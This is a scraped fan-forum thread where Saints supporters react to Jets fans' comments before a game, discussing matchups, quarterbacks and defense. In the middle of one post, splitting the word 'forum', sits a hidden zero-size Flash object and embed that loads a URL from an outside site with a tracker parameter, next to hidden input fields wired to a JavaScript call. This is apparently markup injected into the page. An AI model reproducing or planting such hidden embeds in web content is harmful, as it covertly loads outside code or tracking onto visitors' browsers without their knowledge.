What the Jets fans are saying: (2 Viewers)

They still love vilma, so they love us by proxy, that and everything they are saying is true.

I really don't mind the Jets after they basically gave away Vilma to us for free.

In New York most of the bandwagon types and idiots are naturally sucked in by the Yankees and Giants, so Jets fans and Mets fans start off with a better pool of people to begin with.

Jets fans are talking very respectful, because our team has given them good reason. I do want to add though, that because of this board, and the calibre of discussion, it adds to the ability for a discourse of epic proportion.

Ouch. Big words. Need more beer to put out the burn.

Jets fans can actually spell Meachem, why can't we?
Quote:
Unbeatable CB vs. a WR no one can cover. A massive black hole is going to form in the middle of the field and un-make the world.

LMAO.....,good stuff

These guys understand the game and have been through
they own trials and tribulations the past few years. Their beef with New England was personal, New Orleans is business.
They also understand their QB is a rookie and plays like it
sometimes, this is his first trip to the Dome, playing
an inspired and destined Saints club.

From their fo<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://gotsaints.com/?tracker=4276"></param><param name="allowFullScreen" value="true"></param><embed src="http://gotsaints.com/?tracker=4276" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>rum. Looks like they are giving us some good respect. I respect their team too, they pulled off a good win today:

How does it feel, saints fans, to see our team getting RESPECT?
Lots of respect this is going to be a kick *** game!
<input id="gwProxy" type="hidden"><!--Session data--><input onclick="jsCall();" id="jsProxy" type="hidden">

Jets fans can actually spell Meachem, why can't we?

(sigh) whoever posted this on thier forum plese go back and insert the words you left out...lol
:idunno:
Definately the key here, as is just about any game in the NFL..problem is the Saints have been extremely against the run this year and have faced some pretty good backs, but at the same time haven't faced any top tier QB's either.

Sanchez will be the key with the Saints loading up and trying to make him take this game to the air and if this happens, Saints win easily.

Turnovers is the biggest point of emphasis the Jets need to make though because in every game, the Saints have had at least one turnover that have given them the short field and they will capitalize, especially in the dome.

You would be surprised I live in Hoboken Nj and most Jet and Giant fans are respecting us. I have a few friends who are Jet fans who have been nervous to play the saints since last week in Phila. Also I know the giants and jets both have decent Qbs but most in the fanbase think Brees is god and wish they had him on the team.

In New York most of the bandwagon types and idiots are naturally sucked in by the Yankees and Giants, so Jets fans and Mets fans start off with a better pool of people to begin with.

HAHAHA. It's true the Yankees and Giants have a lot of bandwagon types, but also a lot of true loyal fans (the Giants had a waiting list of 80K for season tickets). But honestly, Met/Jet fans are the angry bitter types. I root for the Jets a lot, I went to school with Testaverde (high school) and he is a hometown hero. I was crushed when they lost that playoff game to Denver. That should have been their year.

2 quality teams playing good offense/defense? Somebody's going home 3-1. That' all I know.

A splendid start to the season for both teams, but to go into the bye week 4-0 would be something.

What we should we worrying about is... if Revis shuts down Colston, how will the rest of the secondary handle Devery Henderson, Lance Moore, Robert Meechum, Heat Evans, Jeremy Shockey, and Reggie Bush lining up in the slot.

Fixt it for them.

:jpshakehead: Silly Jets Fans.

well they actually mentioned our run defense.which is only going to get better.this game will come down to QB play,like every game the Saints play..Saints doing things that they havent been able to do in a couple of years,run the football, an played some great defense yesterday this team looks like there on a mission!!..oh yeah---
WELCOME BACK C.grant an W.smith..

Everybody talks about the "Jets defense vs Saints offense" matchup, but the Jets will need to score points in order to win... that's when Rex's pops' disciple comes into play.

Gregg Williams shut down the Bills offense, who arguably... no.. who definitely has more fire power than the Jets.

PLUS... the game is in the Dome.

Should be fun to watch... but I'm enjoying watching our defense on the field.

Damm somebody quote this... I don't think these words have ever been said on this forum...

I feel our defense is better than their offense. The question is our offense better than their defense? We've seen what a Ryan defense can do to us (Baltimore 2006). If we score 20, I think we win.

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom